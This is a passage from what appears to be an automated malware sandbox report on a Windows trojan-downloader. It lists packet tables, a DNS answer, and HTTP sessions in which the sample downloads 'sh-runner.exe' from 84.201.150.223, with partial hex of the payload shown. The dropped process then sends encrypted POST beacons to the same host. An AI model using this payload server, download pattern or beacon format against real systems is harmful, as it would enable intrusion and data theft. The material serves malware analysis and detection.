Sep 28, 2024 17:52:35.304727077 CEST	49742	8443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.304749966 CEST	49742	8443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.305165052 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.305180073 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.305195093 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.305210114 CEST	49742	8443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.305211067 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.305221081 CEST	49742	8443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.305239916 CEST	49742	8443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.305260897 CEST	49742	8443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.305597067 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.305612087 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.305628061 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.305643082 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.305645943 CEST	49742	8443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.305653095 CEST	49742	8443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.305659056 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.305679083 CEST	49742	8443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.305702925 CEST	49742	8443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.306077957 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.306092978 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.306109905 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.306127071 CEST	49742	8443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.306129932 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.306135893 CEST	49742	8443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.306166887 CEST	49742	8443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.306256056 CEST	49742	8443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.306498051 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.306513071 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.306528091 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.306535959 CEST	49742	8443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.306543112 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.306560040 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.306566954 CEST	49742	8443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.306605101 CEST	49742	8443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.307029009 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.307044029 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.307058096 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.307073116 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.307075024 CEST	49742	8443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.307106972 CEST	49742	8443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.307380915 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.307405949 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.307426929 CEST	49742	8443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.307461023 CEST	49742	8443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.307599068 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.307614088 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.307630062 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.307636976 CEST	49742	8443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.307674885 CEST	49742	8443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.307852983 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.307868958 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.307897091 CEST	49742	8443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.307961941 CEST	49742	8443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.428746939 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.428781033 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.428828955 CEST	49742	8443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.428848982 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.428864956 CEST	49742	8443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.428904057 CEST	49742	8443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.429059029 CEST	49742	8443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.429085016 CEST	49742	8443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.433773994 CEST	8443	49742	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.434400082 CEST	49742	8443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.509993076 CEST	49743	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.510025024 CEST	443	49743	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:35.510121107 CEST	49743	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.510493994 CEST	49743	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:35.510505915 CEST	443	49743	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:36.249912977 CEST	443	49743	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:36.250058889 CEST	49743	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:36.251362085 CEST	49743	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:36.251372099 CEST	443	49743	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:36.251713037 CEST	443	49743	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:36.253201008 CEST	49743	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:36.253273010 CEST	49743	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:36.253277063 CEST	443	49743	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:51.655791044 CEST	49733	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:54.581387997 CEST	49744	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:54.581429005 CEST	443	49744	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:54.581506968 CEST	49744	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:54.581722975 CEST	49744	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:54.581734896 CEST	443	49744	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:55.453777075 CEST	443	49744	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:55.454361916 CEST	49744	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:55.454370975 CEST	443	49744	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:55.515883923 CEST	49744	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:55.515892982 CEST	443	49744	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:55.515929937 CEST	49744	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:55.515933990 CEST	443	49744	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:59.921530008 CEST	49735	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:02.382512093 CEST	63065	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:02.382572889 CEST	443	63065	84.201.150.223	192.168.2.4
Sep 28, 2024 17:53:02.382646084 CEST	63065	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:02.382823944 CEST	63065	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:02.382842064 CEST	443	63065	84.201.150.223	192.168.2.4
Sep 28, 2024 17:53:03.110539913 CEST	443	63065	84.201.150.223	192.168.2.4
Sep 28, 2024 17:53:03.111093044 CEST	63065	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:03.111126900 CEST	443	63065	84.201.150.223	192.168.2.4
Sep 28, 2024 17:53:03.189114094 CEST	63065	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:03.189145088 CEST	443	63065	84.201.150.223	192.168.2.4
Sep 28, 2024 17:53:03.189163923 CEST	63065	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:03.189173937 CEST	443	63065	84.201.150.223	192.168.2.4
Sep 28, 2024 17:53:07.499650955 CEST	49743	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:11.035227060 CEST	63066	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:11.035304070 CEST	443	63066	84.201.150.223	192.168.2.4
Sep 28, 2024 17:53:11.035448074 CEST	63066	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:11.035686016 CEST	63066	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:11.035711050 CEST	443	63066	84.201.150.223	192.168.2.4
Sep 28, 2024 17:53:11.753758907 CEST	443	63066	84.201.150.223	192.168.2.4
Sep 28, 2024 17:53:11.754914999 CEST	63066	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:11.754939079 CEST	443	63066	84.201.150.223	192.168.2.4
Sep 28, 2024 17:53:11.762557030 CEST	63066	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:11.762564898 CEST	443	63066	84.201.150.223	192.168.2.4
Sep 28, 2024 17:53:11.762598991 CEST	63066	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:11.762608051 CEST	443	63066	84.201.150.223	192.168.2.4
Sep 28, 2024 17:53:27.671536922 CEST	49744	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:31.316061974 CEST	63067	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:31.316093922 CEST	443	63067	84.201.150.223	192.168.2.4
Sep 28, 2024 17:53:31.316184998 CEST	63067	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:31.316394091 CEST	63067	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:31.316405058 CEST	443	63067	84.201.150.223	192.168.2.4
Sep 28, 2024 17:53:32.025840044 CEST	443	63067	84.201.150.223	192.168.2.4
Sep 28, 2024 17:53:32.026472092 CEST	63067	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:32.026489019 CEST	443	63067	84.201.150.223	192.168.2.4
Sep 28, 2024 17:53:32.027137995 CEST	63067	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:32.027142048 CEST	443	63067	84.201.150.223	192.168.2.4
Sep 28, 2024 17:53:32.027158022 CEST	63067	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:32.027163029 CEST	443	63067	84.201.150.223	192.168.2.4
Sep 28, 2024 17:53:35.906132936 CEST	63065	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:38.554174900 CEST	63068	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:38.554204941 CEST	443	63068	84.201.150.223	192.168.2.4
Sep 28, 2024 17:53:38.554274082 CEST	63068	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:38.554461002 CEST	63068	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:38.554469109 CEST	443	63068	84.201.150.223	192.168.2.4
Sep 28, 2024 17:53:39.619986057 CEST	443	63068	84.201.150.223	192.168.2.4
Sep 28, 2024 17:53:39.651133060 CEST	63068	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:39.651150942 CEST	443	63068	84.201.150.223	192.168.2.4
Sep 28, 2024 17:53:39.651815891 CEST	63068	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:39.651820898 CEST	443	63068	84.201.150.223	192.168.2.4
Sep 28, 2024 17:53:39.651855946 CEST	63068	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:39.651859999 CEST	443	63068	84.201.150.223	192.168.2.4
Sep 28, 2024 17:53:43.499722958 CEST	63066	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:46.206571102 CEST	63069	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:46.206624031 CEST	443	63069	84.201.150.223	192.168.2.4
Sep 28, 2024 17:53:46.206692934 CEST	63069	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:46.206902981 CEST	63069	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:46.206916094 CEST	443	63069	84.201.150.223	192.168.2.4
Sep 28, 2024 17:53:46.941028118 CEST	443	63069	84.201.150.223	192.168.2.4
Sep 28, 2024 17:53:46.941728115 CEST	63069	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:46.941773891 CEST	443	63069	84.201.150.223	192.168.2.4
Sep 28, 2024 17:53:46.942194939 CEST	63069	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:46.942208052 CEST	443	63069	84.201.150.223	192.168.2.4
Sep 28, 2024 17:53:46.942224979 CEST	63069	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:53:46.942234039 CEST	443	63069	84.201.150.223	192.168.2.4
Sep 28, 2024 17:54:03.656027079 CEST	63067	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:54:06.987692118 CEST	63070	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:54:06.987766027 CEST	443	63070	84.201.150.223	192.168.2.4
Sep 28, 2024 17:54:06.987838030 CEST	63070	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:54:06.988090038 CEST	63070	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:54:06.988121986 CEST	443	63070	84.201.150.223	192.168.2.4
Sep 28, 2024 17:54:07.798113108 CEST	443	63070	84.201.150.223	192.168.2.4
Sep 28, 2024 17:54:07.798706055 CEST	63070	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:54:07.798737049 CEST	443	63070	84.201.150.223	192.168.2.4
Sep 28, 2024 17:54:07.799187899 CEST	63070	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:54:07.799196005 CEST	443	63070	84.201.150.223	192.168.2.4
Sep 28, 2024 17:54:07.799211025 CEST	63070	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:54:07.799217939 CEST	443	63070	84.201.150.223	192.168.2.4
Sep 28, 2024 17:54:11.909471035 CEST	63068	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:54:15.048329115 CEST	63071	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:54:15.048357010 CEST	443	63071	84.201.150.223	192.168.2.4
Sep 28, 2024 17:54:15.048425913 CEST	63071	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:54:15.048619032 CEST	63071	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:54:15.048629999 CEST	443	63071	84.201.150.223	192.168.2.4
Sep 28, 2024 17:54:15.785108089 CEST	443	63071	84.201.150.223	192.168.2.4
Sep 28, 2024 17:54:15.789175034 CEST	63071	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:54:15.789186001 CEST	443	63071	84.201.150.223	192.168.2.4
Sep 28, 2024 17:54:15.789674997 CEST	63071	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:54:15.789679050 CEST	443	63071	84.201.150.223	192.168.2.4
Sep 28, 2024 17:54:15.789690971 CEST	63071	443	192.168.2.4	84.201.150.223
Sep 28, 2024 17:54:15.789695024 CEST	443	63071	84.201.150.223	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2024 17:52:57.818856955 CEST	53	58532	162.159.36.2	192.168.2.4
Sep 28, 2024 17:52:58.288197994 CEST	53	65438	1.1.1.1	192.168.2.4

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 28, 2024 17:52:15.683020115 CEST	1.1.1.1	192.168.2.4	0x909	No error (0)	windowsupdatebg.s.llnwi.net		41.63.96.128	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

84.201.150.223

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	84.201.150.223	80	7128	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe

Timestamp	Bytes transferred	Direction	Data
Sep 28, 2024 17:52:12.405299902 CEST	102	OUT	GET /sh-runner.exe HTTP/1.1 User-Agent: Downloader Host: 84.201.150.223 Cache-Control: no-cache
Sep 28, 2024 17:52:13.120754957 CEST	208	IN	HTTP/1.0 200 OK Server: SimpleHTTP/0.6 Python/3.11.2 Date: Sat, 28 Sep 2024 15:52:13 GMT Content-type: application/x-msdos-program Content-Length: 1169665 Last-Modified: Tue, 24 Sep 2024 10:48:25 GMT
Sep 28, 2024 17:52:13.120980024 CEST	1236	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdf6&+2@`
Sep 28, 2024 17:52:13.121207952 CEST	224	IN	Data Raw: 84 00 00 00 0e 0f 86 7b ff ff ff 8b 90 f8 00 00 00 31 c9 85 d2 0f 95 c1 e9 69 ff ff ff 0f 1f 80 00 00 00 00 48 8b 0d 91 04 0c 00 e8 9c a1 09 00 31 c0 48 83 c4 28 c3 0f 1f 44 00 00 83 78 74 0e 0f 86 40 ff ff ff 44 8b 80 e8 00 00 00 31 c9 45 85 c0 Data Ascii: {1iH1H(Dxt@D1E,fH8HeL.H.H..HDH.HD$ }H8ATUWVSH HOH-G1eH%0HpH9
Sep 28, 2024 17:52:13.121223927 CEST	1236	IN	Data Raw: 84 67 01 00 00 b9 e8 03 00 00 ff d5 48 89 f8 f0 48 0f b1 33 48 85 c0 75 e3 48 8b 35 1c 03 0c 00 31 ff 8b 06 83 f8 01 0f 84 56 01 00 00 8b 06 85 c0 0f 84 b5 01 00 00 c7 05 13 2e 0d 00 01 00 00 00 8b 06 83 f8 01 0f 84 4c 01 00 00 85 ff 0f 84 65 01 Data Ascii: gHH3HuH51V.LeHAHHtE11HQGHHH-{HcHHL%-HFH1IHpHIHDIHH
Sep 28, 2024 17:52:13.121243000 CEST	1236	IN	Data Raw: bb 09 00 0f 11 80 20 02 00 00 0f 28 05 97 bb 09 00 0f 11 80 30 02 00 00 0f 28 05 99 bb 09 00 0f 11 80 40 02 00 00 0f 28 05 9b bb 09 00 0f 11 80 50 02 00 00 0f 28 05 9d bb 09 00 0f 11 80 60 02 00 00 0f 28 05 9f bb 09 00 0f 11 80 70 02 00 00 0f 28 Data Ascii: (0(@(P(`(p((((((((((( (
Sep 28, 2024 17:52:13.121267080 CEST	1236	IN	Data Raw: 11 80 a0 07 00 00 0f 28 05 47 bc 09 00 0f 11 80 b0 07 00 00 0f 28 05 49 bc 09 00 0f 11 80 c0 07 00 00 0f 28 05 4b bc 09 00 0f 11 80 d0 07 00 00 0f 28 05 4d bc 09 00 0f 11 80 e0 07 00 00 0f 28 05 4f bc 09 00 0f 11 80 f0 07 00 00 0f 28 05 51 bc 09 Data Ascii: (G(I(K(M(O(Q(S(U (W0(Y@([P(]`(_p(a(c(e(g
Sep 28, 2024 17:52:13.121283054 CEST	1236	IN	Data Raw: 01 48 89 51 18 44 0f b6 00 45 84 c0 78 0d 44 89 c2 66 b8 01 00 5d c3 31 c0 5d c3 44 89 c2 83 e2 1f 4c 8d 48 02 4c 89 49 18 44 0f b6 50 01 41 83 e2 3f 41 80 f8 df 76 40 4c 8d 48 03 4c 89 49 18 44 0f b6 48 02 41 c1 e2 06 41 83 e1 3f 45 09 d1 41 80 Data Ascii: HQDExDf]1]DLHLIDPA?Av@LHLIDHAA?EAr`L@LA@A?DGDf]DvDAAfQ3ADvDAAfQ(fD]f
Sep 28, 2024 17:52:13.121299982 CEST	1236	IN	Data Raw: 33 48 ff c1 48 89 4d f8 48 8d 0d 45 da 09 00 48 89 4c 24 20 48 8d 15 c1 e8 09 00 4c 8d 4d f8 41 b8 04 00 00 00 48 89 c1 e8 6f 67 08 00 90 48 83 c4 30 5d c3 48 8d 15 76 e8 09 00 41 b8 04 00 00 00 48 89 c1 48 83 c4 30 5d e9 2e 60 08 00 66 66 66 66 Data Ascii: 3HHMHEHL$ HLMAHogH0]HvAHH0].`fffff.UHIHHHP]nfUVH8Hl$0LHuAH_H4H8^]fff.UHHB4u u]C]a/]0f.UHI
Sep 28, 2024 17:52:13.121325016 CEST	1236	IN	Data Raw: 83 fa 01 75 29 48 8d 15 00 24 0a 00 41 b8 07 00 00 00 eb 0d 48 8d 15 e7 23 0a 00 41 b8 0a 00 00 00 48 89 c1 48 83 c4 30 5d e9 7a 5b 08 00 48 83 c1 08 48 89 4d f8 48 8d 0d 93 da 09 00 48 89 4c 24 20 48 8d 15 ca 23 0a 00 4c 8d 4d f8 41 b8 04 00 00 Data Ascii: u)H$AH#AHH0]z[HHMHHL$ H#LMAHmbH0]fDUHH]+UVH8Hl$0LHuAH,[HdH8^]fff.UH0Hl$0HH1H;qHAHH0]ZHMH
Sep 28, 2024 17:52:13.121342897 CEST	776	IN	Data Raw: 3f 80 ca 80 88 55 07 41 b8 04 00 00 00 48 8b 0e 48 8d 55 04 e8 4b e6 02 00 48 89 c7 48 85 c0 74 16 48 8d 5e 08 48 83 7e 08 00 74 08 48 89 d9 e8 40 21 00 00 48 89 3b 48 85 ff 0f 95 c0 48 83 c4 28 5b 5f 5e 5d c3 48 89 3b 48 89 c1 e8 13 78 09 00 cc Data Ascii: ?UAHHUKHHtH^H~tH@!H;HH([_^]H;HxfUVWSH(Hl$ HEsUAsE?UA\s%E$?E?UA/E$?E$?E?
Sep 28, 2024 17:52:13.134938955 CEST	1236	IN	Data Raw: 80 88 45 05 89 d0 c1 e8 06 24 3f 0c 80 88 45 06 80 e2 3f 80 ca 80 88 55 07 be 04 00 00 00 48 8b 39 48 8b 07 48 8b 5f 10 48 29 d8 48 39 f0 72 25 48 8b 4f 08 48 01 d9 48 8d 55 04 49 89 f0 e8 49 78 09 00 48 01 f3 48 89 5f 10 31 c0 48 83 c4 38 5b 5f Data Ascii: E$?E?UH9HH_H)H9r%HOHHUIIxHH_1H8[_^]HD$ AHHIH_@UVWSH(Hl$ HEsUAsE?UA\s%E$?E?UA

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	84.201.150.223	443	3096	C:\ProgramData\sh-runner.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 15:52:18 UTC	271	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: / User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Content-Length: 243 Host: 84.201.150.223
2024-09-28 15:52:18 UTC	243	OUT	Data Raw: 00 00 00 ef de ad be ef 3c f2 86 5e 00 00 00 63 00 00 00 00 9c 78 0c 3e e0 d2 8e 0e 02 80 be 12 34 f2 ba 86 7c dc 8e 12 c8 06 f4 b0 78 80 fa 34 30 ec 9e b4 ea ca 98 0a 1a 42 90 98 14 12 44 00 4e 0e a2 8e 91 55 7b 2f 9c 23 c5 67 89 c8 23 72 1f 0e 24 ad 07 fe fd 41 17 fb 13 30 54 8d 7a b2 f6 1a 78 ad 11 d8 74 b3 d9 dd c2 ff aa c9 0a 6f b2 ad 33 c7 b9 86 3c 08 c6 a8 3e 5b 2a 44 2d 92 67 79 da ad 1b c2 61 8c ae df db cd 49 28 9c 32 8b 24 de b8 e2 ea a3 23 f2 a5 84 0b e6 09 9f c6 78 e7 48 b9 11 ff d1 7b 2f 6e 3f 5c 86 63 e7 88 3f 5b ad b8 9d 37 41 3a ec e2 66 42 df af 65 84 4b 83 ee 95 38 5b d1 b2 14 23 c5 b6 84 93 66 15 7a ce 3c db 24 67 c5 80 87 ec f4 ba 1c e5 62 62 94 7e 11 28 29 22 5b d7 7d 98 1c 64 43 20 37 62 13 da 20 Data Ascii: <^cx>4\|x40BDNU{/#g#r$A0Tzxto3<>[*D-gyaI(2$#xH{/n?\c?[7A:fBeK8[#fz<$gbb~()"[}dC 7b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49735	84.201.150.223	443	2196	C:\ProgramData\sh-runner.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 15:52:28 UTC	271	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: / User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Content-Length: 243 Host: 84.201.150.223
2024-09-28 15:52:28 UTC	243	OUT	Data Raw: 00 00 00 ef de ad be ef 2c d8 bf fa 00 00 00 63 00 00 00 00 a8 1e b0 56 04 f4 40 d0 1e 46 dc f8 da 86 86 1c 44 d6 12 2a 58 2a 08 50 a6 74 42 b8 60 b6 46 62 24 a0 ba b0 c6 66 24 1e b0 a0 dc c0 06 d4 3c 06 5a c0 dd 32 8b 3f 5f 42 3c a3 98 27 d3 48 54 a4 e8 09 84 63 e3 fd cf 7f 3e 86 ec 8f 74 be 75 70 72 32 21 6e 43 71 bc dc 38 46 8b c9 e1 6e 6f 1a 9d 9c 1f 99 a7 bb 6a ba 66 b2 d2 3f f4 0d ae 6c a0 d3 8d 03 f4 9b 92 6b 43 ae 6d fe f2 17 c4 db 81 a1 cf c9 3a 9a 5d 1c 46 98 26 08 98 60 7e 9e c8 9d 16 5c b7 09 37 b2 e6 71 b8 23 f1 8c 9d 8f b4 e0 43 ff 24 5b c9 5f 11 dc ec cb 10 46 51 68 5b e3 76 f3 ff 75 1e f0 b9 77 02 47 77 d2 b7 02 91 35 70 cd 72 f4 ce 60 b7 08 fc a3 e5 66 b9 de e7 5a 0b 7d 66 64 ef c3 07 2f cf f4 a4 56 76 Data Ascii: ,cV@FDXPtB`Fb$f$<Z2?_B<'HTc>tupr2!nCq8Fnojf?lkCm:]F&`~\7q#C$[_FQh[vuwGw5pr`fZ}fd/Vv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49743	84.201.150.223	443	5472	C:\ProgramData\sh-runner.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 15:52:36 UTC	271	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: / User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Content-Length: 243 Host: 84.201.150.223
2024-09-28 15:52:36 UTC	243	OUT	Data Raw: 00 00 00 ef de ad be ef 34 ad 5b d0 00 00 00 63 00 00 00 00 b6 9a 6e 04 78 18 1c 3e f2 32 bc 10 c4 74 d6 04 50 8c c0 30 06 aa 8e 42 52 ba be 50 bc 08 b0 22 d2 54 ce 22 88 8e 8c cc 98 6a 28 14 74 fe f8 d8 56 e0 29 21 6c a7 b8 b8 d3 81 21 57 ed 65 c1 90 4d 14 b5 c0 e3 0b 2d c4 49 eb 42 e1 11 e0 e6 f3 c9 6b 26 b7 f9 09 ad 33 20 55 d3 ff 07 2d ef 25 29 17 0b fc 17 85 0b 4e 04 c2 70 8b 72 8a 54 85 24 20 6e cf 66 45 30 f7 43 d2 af 09 69 f6 6d 1a 85 36 30 ee 70 42 0b 66 5d f1 ab a7 1d 15 b8 ca ee 22 f1 1c 54 2d 78 ac e9 e1 5e dc fc cd 90 40 c2 23 d5 76 3e a5 c0 eb 29 1c fe 15 39 10 19 5e 1f e8 42 01 fa 43 fc 4a af 9c 98 e1 24 be 4c 9e fd b8 ae 9a fd 89 f3 b3 a2 af 08 1d 1d a8 e3 9c 9b 26 73 39 0a 49 ad fd f4 c6 2c 8e 87 ac 9e Data Ascii: 4[cnx>2tP0BRP"T"j(tV)!l!WeM-IBk&3 U-%)NprT$ nfE0Cim60pBf]"T-x^@#v>)9^BCJ$L&s9I,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49744	84.201.150.223	443	3096	C:\ProgramData\sh-runner.exe

Timestamp	Bytes transferred	Direction	Data
